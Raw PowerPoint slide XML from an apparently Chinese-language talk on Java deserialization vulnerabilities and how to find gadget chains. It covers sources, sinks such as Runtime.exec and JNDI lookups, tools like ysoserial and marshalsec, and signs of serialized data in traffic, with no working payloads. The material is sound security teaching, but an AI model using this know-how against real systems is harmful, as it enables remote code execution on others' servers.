        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="Rectangle 15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1524000" y="1371600"/>
              <a:ext cx="1524000" cy="137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9144000" y="1371600"/>
              <a:ext cx="1524000" cy="137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668000" y="1371600"/>
              <a:ext cx="15240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0" y="1371600"/>
              <a:ext cx="1524000" cy="13716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096000" y="1371600"/>
              <a:ext cx="1524000" cy="1371600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3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48000" y="1371600"/>
              <a:ext cx="1524000" cy="13716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7620000" y="1371600"/>
              <a:ext cx="1524000" cy="13716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572000" y="1371600"/>
              <a:ext cx="1524000" cy="1371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cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4842297" y="-16913"/>
            <a:ext cx="2507406" cy="1192788"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2185602" h="1104977">
                <a:moveTo>
                  <a:pt x="1092801" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="1696338" y="0"/>
                  <a:pt x="2185602" y="489264"/>
                  <a:pt x="2185602" y="1092801"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2184987" y="1104977"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="615" y="1104977"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1092801"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="489264"/>
                  <a:pt x="489264" y="0"/>
                  <a:pt x="109280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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1983423" y="2984500"/>
            <a:ext cx="8225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5400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Q&amp;A</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="5400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent4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  <p:transition advTm="8845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3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4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00"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="18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反序列化漏洞及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gadget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挖掘思路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317CA8-2397-4FA3-9BA1-103AA6F2B7B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="936394" y="1274878"/>
            <a:ext cx="9706467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ea typeface="方正兰亭准黑_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="方正兰亭准黑_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>、首先要找到反序列化入口（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:ea typeface="方正兰亭准黑_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>source</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="方正兰亭准黑_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>）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2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="方正兰亭准黑_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>、调用链（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:ea typeface="方正兰亭准黑_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>gadget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="方正兰亭准黑_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>）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3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="方正兰亭准黑_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>、触发漏洞的目标方法（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:ea typeface="方正兰亭准黑_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>sink</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="方正兰亭准黑_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>） 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java</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="方正兰亭准黑_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>反序列化漏洞辅助工具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gadgetinspector</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="方正兰亭准黑_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>思想：从</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:ea typeface="方正兰亭准黑_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>source</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="方正兰亭准黑_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>出发，通过广度优先搜索（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:ea typeface="方正兰亭准黑_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>BFS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="方正兰亭准黑_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>），生成通往</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:ea typeface="方正兰亭准黑_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>sink</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="方正兰亭准黑_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>的调用链。已存在的反序列化</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:ea typeface="方正兰亭准黑_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>gadgets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="方正兰亭准黑_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>工具：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ysoserial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="方正兰亭准黑_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>和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marshalsec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endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:ea typeface="方正兰亭准黑_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="方正兰亭准黑_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>在这里</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:ea typeface="方正兰亭准黑_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>source</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="方正兰亭准黑_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>包括：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ea typeface="方正兰亭准黑_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Java</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="方正兰亭准黑_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>原生的反序列化，即通过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ObjectInputStream.readObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:ea typeface="方正兰亭准黑_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="方正兰亭准黑_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>，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readExternal,readResolve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="方正兰亭准黑_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>处理二进制格式内容，得到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:ea typeface="方正兰亭准黑_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Java</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="方正兰亭准黑_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>对象。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pPr marL="457200" indent="-457200">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="方正兰亭准黑_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>专有格式的反序列化，例如通过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jackson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fastjson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XStream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XMLDecoder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="方正兰亭准黑_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>等第三方库，处理</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:ea typeface="方正兰亭准黑_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>json, xml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="方正兰亭准黑_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>等格式内容，得到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:ea typeface="方正兰亭准黑_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Java</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="方正兰亭准黑_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>对象</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:ea typeface="方正兰亭准黑_GBK" panose="02000000000000000000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92079D-6D90-43D4-91D7-0DCFC0CA1E2F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="936394" y="657225"/>
            <a:ext cx="34996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gadget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挖掘思路</a:t>
            </a:r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endParaRPr lang="zh-CN" altLang="en-US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1251262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反序列化漏洞及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gadget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挖掘思路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B317CA8-2397-4FA3-9BA1-103AA6F2B7B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="936394" y="1274878"/>
            <a:ext cx="10611441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ea typeface="方正兰亭准黑_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>执行目标</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:ea typeface="方正兰亭准黑_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>sink,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="方正兰亭准黑_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>包括：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1. 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Runtime.exec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:ea typeface="方正兰亭准黑_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="方正兰亭准黑_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>，这种最为简单直接，即直接在目标环境中执行命令 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2. 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Method.invoke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:ea typeface="方正兰亭准黑_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="方正兰亭准黑_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>，这种需要适当地选择方法和参数，通过反射执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:ea typeface="方正兰亭准黑_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Java</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="方正兰亭准黑_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>方法 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3. RMI/JNDI/JRMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="方正兰亭准黑_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>等，通过引用远程对象，间接实现任意代码执行的效果 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4. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="方正兰亭准黑_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>实例化对象，构造函数调用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5.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> 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java.beans.EventHandler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="方正兰亭准黑_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>构造恶意的动态代理函数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、反序列化漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:ea typeface="方正兰亭准黑_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>挖掘思路</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:ea typeface="方正兰亭准黑_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>:</a:t>
            </a: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1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="方正兰亭准黑_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>、白盒：审计反序列化入口点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readObject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readExteranl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="方正兰亭准黑_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:ea typeface="方正兰亭准黑_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>readResolve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="方正兰亭准黑_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>里面的敏感操作，搜索</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:ea typeface="方正兰亭准黑_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Commons-Collections</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="方正兰亭准黑_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>等存在反序列化漏洞的库文件。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:ea typeface="方正兰亭准黑_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:ea typeface="方正兰亭准黑_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="方正兰亭准黑_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>、黑盒：对应用进行抓包，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:ea typeface="方正兰亭准黑_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>java</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="方正兰亭准黑_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>序列化数据会以（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:ea typeface="方正兰亭准黑_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>ac ed 00 05</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="方正兰亭准黑_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>）开头，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:ea typeface="方正兰亭准黑_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>base64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="方正兰亭准黑_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>编码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:ea typeface="方正兰亭准黑_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>ro0AB</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:ea typeface="方正兰亭准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99194226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defTabSz="913765"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Java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反序列化漏洞及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gadget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挖掘思路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488BB5F-E458-4746-A093-152E18E84CB3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="615885" y="103121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>
                <a:ea typeface="方正兰亭准黑_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Source</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:ea typeface="方正兰亭准黑_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>为原生的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:ea typeface="方正兰亭准黑_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>java</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:ea typeface="方正兰亭准黑_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>反序列化</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:ea typeface="方正兰亭准黑_GBK" panose="020000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829FB25-5C9A-4F1B-853A-D01403A05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393" y="1292828"/>
            <a:ext cx="5956607" cy="521414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C4DDEF8-5D38-4970-92E9-84E2849D4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5" y="2353989"/>
            <a:ext cx="6323373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04577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27270" y="1666124"/>
            <a:ext cx="2384573" cy="2384573"/>
            <a:chOff x="4240335" y="3008435"/>
            <a:chExt cx="3711332" cy="3711332"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="椭圆 2"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4240335" y="3008435"/>
              <a:ext cx="3711332" cy="3711332"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:gradFill>
              <a:gsLst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5400000" scaled="0"/>
            </a:gradFill>
            <a:ln w="9525"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865">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="宋体" panose="0201060003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4710169" y="3478269"/>
              <a:ext cx="2771663" cy="2771663"/>
              <a:chOff x="2193191" y="1899415"/>
              <a:chExt cx="2421376" cy="2421376"/>
            </a:xfrm>
            <a:effectLst/>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="5" name="椭圆 4"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2193191" y="1899415"/>
                <a:ext cx="2421376" cy="2421376"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
              <a:ln w="31750">
                <a:gradFill flip="none" rotWithShape="1">
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:schemeClr val="bg1">
                        <a:lumMod val="75000"/>
                      </a:schemeClr>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:schemeClr val="bg1"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="2700000" scaled="1"/>
                  <a:tileRect/>
                </a:gradFill>
              </a:ln>
              <a:effectLst>
                <a:innerShdw blurRad="127000" dist="63500" dir="13500000">
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                    <a:alpha val="85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2345502" y="2051726"/>
                <a:ext cx="2116756" cy="211675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50800">
                <a:noFill/>
              </a:ln>
              <a:effectLst>
                <a:outerShdw blurRad="152400" dist="63500" dir="2700000" algn="tl" rotWithShape="0">
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                    <a:alpha val="64000"/>
                  </a:schemeClr>
                </a:outerShdw>
              </a:effectLst>
              <a:scene3d>
                <a:camera prst="orthographicFront"/>
                <a:lightRig rig="threePt" dir="t"/>
              </a:scene3d>
              <a:sp3d prstMaterial="softEdge">
                <a:bevelT w="82550" h="25400"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zh-CN" altLang="en-US" sz="1865">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill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4" name="任意多边形 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="600" y="-348344"/>
            <a:ext cx="2718956" cy="7417183"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 2837789"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 8001905"/>
              <a:gd name="connsiteX1" fmla="*/ 2837788 w 2837789"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 8001905"/>
              <a:gd name="connsiteX2" fmla="*/ 2837788 w 2837789"/>
              <a:gd name="connsiteY2" fmla="*/ 1968500 h 8001905"/>
              <a:gd name="connsiteX3" fmla="*/ 2837789 w 2837789"/>
              <a:gd name="connsiteY3" fmla="*/ 1968500 h 8001905"/>
              <a:gd name="connsiteX4" fmla="*/ 2837789 w 2837789"/>
              <a:gd name="connsiteY4" fmla="*/ 2363879 h 8001905"/>
              <a:gd name="connsiteX5" fmla="*/ 2618085 w 2837789"/>
              <a:gd name="connsiteY5" fmla="*/ 2386026 h 8001905"/>
              <a:gd name="connsiteX6" fmla="*/ 1747634 w 2837789"/>
              <a:gd name="connsiteY6" fmla="*/ 3454034 h 8001905"/>
              <a:gd name="connsiteX7" fmla="*/ 2618085 w 2837789"/>
              <a:gd name="connsiteY7" fmla="*/ 4522042 h 8001905"/>
              <a:gd name="connsiteX8" fmla="*/ 2837789 w 2837789"/>
              <a:gd name="connsiteY8" fmla="*/ 4544190 h 8001905"/>
              <a:gd name="connsiteX9" fmla="*/ 2837789 w 2837789"/>
              <a:gd name="connsiteY9" fmla="*/ 6858000 h 8001905"/>
              <a:gd name="connsiteX10" fmla="*/ 2837788 w 2837789"/>
              <a:gd name="connsiteY10" fmla="*/ 6858000 h 8001905"/>
              <a:gd name="connsiteX11" fmla="*/ 2837788 w 2837789"/>
              <a:gd name="connsiteY11" fmla="*/ 8001905 h 8001905"/>
              <a:gd name="connsiteX12" fmla="*/ 0 w 2837789"/>
              <a:gd name="connsiteY12" fmla="*/ 8001905 h 8001905"/>
              <a:gd name="connsiteX13" fmla="*/ 0 w 2837789"/>
              <a:gd name="connsiteY13" fmla="*/ 6858000 h 8001905"/>
              <a:gd name="connsiteX14" fmla="*/ 0 w 2837789"/>
              <a:gd name="connsiteY14" fmla="*/ 6376305 h 8001905"/>
              <a:gd name="connsiteX15" fmla="*/ 0 w 2837789"/>
              <a:gd name="connsiteY15" fmla="*/ 2133600 h 8001905"/>
              <a:gd name="connsiteX16" fmla="*/ 0 w 2837789"/>
              <a:gd name="connsiteY16" fmla="*/ 1968500 h 8001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37789" h="8001905">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2837788" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2837788" y="1968500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2837789" y="1968500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2837789" y="2363879"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2618085" y="2386026"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2121320" y="2487680"/>
                  <a:pt x="1747634" y="2927218"/>
                  <a:pt x="1747634" y="3454034"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1747634" y="3980852"/>
                  <a:pt x="2121320" y="4420389"/>
                  <a:pt x="2618085" y="4522042"/>
